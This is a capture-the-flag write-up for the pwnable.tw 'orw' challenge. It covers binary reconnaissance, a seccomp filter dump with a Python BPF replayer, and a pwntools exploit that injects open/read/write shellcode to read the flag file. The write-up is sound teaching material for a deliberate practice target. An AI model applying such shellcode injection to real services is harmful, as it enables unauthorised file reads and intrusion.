Pwnable.tw - orw Description
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use.
Source https://pwnable.tw/challenge/#2
0x1 Initial Reconnaissance

As usual, start by collecting some basic information about the binary.
file

```
└─$ file orw
orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped
```
checksec

```
└─$ checksec orw
[*] '/home/kazmatw/pwnable/orw/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
```
./orw

```
└─$ ./orw
Give my your shellcode:1234
Segmentation fault
```
seccomp

```
└─$ seccomp-tools dump ./orw
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0x40000003  if (A != ARCH_I386) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x07 0x00 0x000000ad  if (A == rt_sigreturn) goto 0011
 0004: 0x15 0x06 0x00 0x00000077  if (A == sigreturn) goto 0011
 0005: 0x15 0x05 0x00 0x000000fc  if (A == exit_group) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == exit) goto 0011
 0007: 0x15 0x03 0x00 0x00000005  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == read) goto 0011
 0009: 0x15 0x01 0x00 0x00000004  if (A == write) goto 0011
 0010: 0x06 0x00 0x00 0x00050026  return ERRNO(38)
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
```
disassemble main

```
gef➤ disassemble main
Dump of assembler code for function main:
   0x08048548 <+0>:     lea    ecx,[esp+0x4]
   0x0804854c <+4>:     and    esp,0xfffffff0
   0x0804854f <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048552 <+10>:    push   ebp
   0x08048553 <+11>:    mov    ebp,esp
   0x08048555 <+13>:    push   ecx
   0x08048556 <+14>:    sub    esp,0x4
   0x08048559 <+17>:    call   0x80484cb <orw_seccomp>
   0x0804855e <+22>:    sub    esp,0xc
   0x08048561 <+25>:    push   0x80486a0
   0x08048566 <+30>:    call   0x8048380 <printf@plt>
   0x0804856b <+35>:    add    esp,0x10
   0x0804856e <+38>:    sub    esp,0x4
   0x08048571 <+41>:    push   0xc8
   0x08048576 <+46>:    push   0x804a060
   0x0804857b <+51>:    push   0x0
   0x0804857d <+53>:    call   0x8048370 <read@plt>
   0x08048582 <+58>:    add    esp,0x10
   0x08048585 <+61>:    mov    eax,0x804a060
   0x0804858a <+66>:    call   eax
   0x0804858c <+68>:    mov    eax,0x0
   0x08048591 <+73>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x08048594 <+76>:    leave
   0x08048595 <+77>:    lea    esp,[ecx-0x4]
   0x08048598 <+80>:    ret
End of assembler dump.
```
0x2 Exploitation

The challenge description says only open, read and write may be used, and the seccomp-tools dump confirms that restriction: any other syscall number (and anything that is not rt_sigreturn/sigreturn/exit/exit_group) returns ERRNO(38), i.e. ENOSYS. Reversing main shows the program simply reads up to 0xc8 bytes into a global buffer at 0x804a060 and calls it as shellcode, so there is not much to explain: straight to the exploit XD.
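As an added example (not part of the original writeup), here is a tiny classic-BPF interpreter in Python that replays the filter dumped above, so you can check offline which syscall numbers the sandbox lets through without touching the binary. The instruction tuples are copied from the seccomp-tools dump; the i386 syscall numbers in the comments are assumed from the standard table.

```python
# Classic-BPF interpreter for the seccomp filter dumped by seccomp-tools.
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_RET_ALLOW = 0x7fff0000
SECCOMP_RET_ERRNO = 0x00050000
SECCOMP_RET_ACTION_FULL = 0xffff0000

# (code, jt, jf, k) exactly as printed in the seccomp-tools dump.
FILTER = [
    (0x20, 0x00, 0x00, 0x00000004),  # A = arch
    (0x15, 0x00, 0x09, 0x40000003),  # if A != ARCH_I386 goto 0011
    (0x20, 0x00, 0x00, 0x00000000),  # A = sys_number
    (0x15, 0x07, 0x00, 0x000000ad),  # rt_sigreturn
    (0x15, 0x06, 0x00, 0x00000077),  # sigreturn
    (0x15, 0x05, 0x00, 0x000000fc),  # exit_group
    (0x15, 0x04, 0x00, 0x00000001),  # exit
    (0x15, 0x03, 0x00, 0x00000005),  # open
    (0x15, 0x02, 0x00, 0x00000003),  # read
    (0x15, 0x01, 0x00, 0x00000004),  # write
    (0x06, 0x00, 0x00, 0x00050026),  # return ERRNO(38)
    (0x06, 0x00, 0x00, 0x7fff0000),  # return ALLOW
]


def run_filter(prog, nr, arch=AUDIT_ARCH_I386):
    """Evaluate the filter for one seccomp_data {nr, arch}; return the raw action."""
    data = {0: nr, 4: arch}  # struct seccomp_data: nr at offset 0, arch at 4
    pc, acc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        if code == 0x20:            # BPF_LD|BPF_W|BPF_ABS: A = data[k]
            acc = data[k]
            pc += 1
        elif code == 0x15:          # BPF_JMP|BPF_JEQ|BPF_K: skip jt or jf instrs
            pc += 1 + (jt if acc == k else jf)
        elif code == 0x06:          # BPF_RET|BPF_K: return the action k
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x} at {pc}")


def describe(action):
    """Render a raw seccomp action the way seccomp-tools prints it."""
    if action == SECCOMP_RET_ALLOW:
        return "ALLOW"
    if action & SECCOMP_RET_ACTION_FULL == SECCOMP_RET_ERRNO:
        return f"ERRNO({action & 0xffff})"
    return f"{action:#010x}"


if __name__ == "__main__":
    # assumed i386 numbers: open=5, read=3, write=4, execve=11, openat=295
    for name, nr in [("open", 5), ("read", 3), ("write", 4), ("execve", 11), ("openat", 295)]:
        print(f"{name:>7} ({nr:3}) -> {describe(run_filter(FILTER, nr))}")
```

Note that instruction 0001 jumps straight to ALLOW when the arch field is not i386, which is why hardened filters return KILL on an arch mismatch instead of skipping the checks.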
0x3 Exploit

```python
from pwn import *

context.arch = 'i386'  # assemble 32-bit shellcode to match the target
r = remote('chall.pwnable.tw', 10001)

# open("/home/orw/flag") -> fd in eax, read 50 bytes onto the stack, write them to stdout
sc = asm(
    shellcraft.i386.linux.open(b'/home/orw/flag') +
    shellcraft.i386.linux.read('eax', 'esp', 50) +
    shellcraft.i386.linux.write('1', 'esp', 50)
)

r.sendafter(b':', sc)
flag = r.recvuntil(b'}')
r.recv()
success('Flag: %s' % flag)
r.interactive()
```
Result:
```
└─$ python exploit.py
[+] Opening connection to chall.pwnable.tw on port 10001: Done
[+] Flag: b'FLAG{?????????????????????????}'
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
```
0x5 References

See 張元's how2orw from edu-ctf; the video link and writeup are below:
https://www.youtube.com/watch?v=U8N6aE-Nq-Q
https://kazma.tw/2023/12/10/Yuawn-Pwn1-orw-Writeup/
Pwned !!!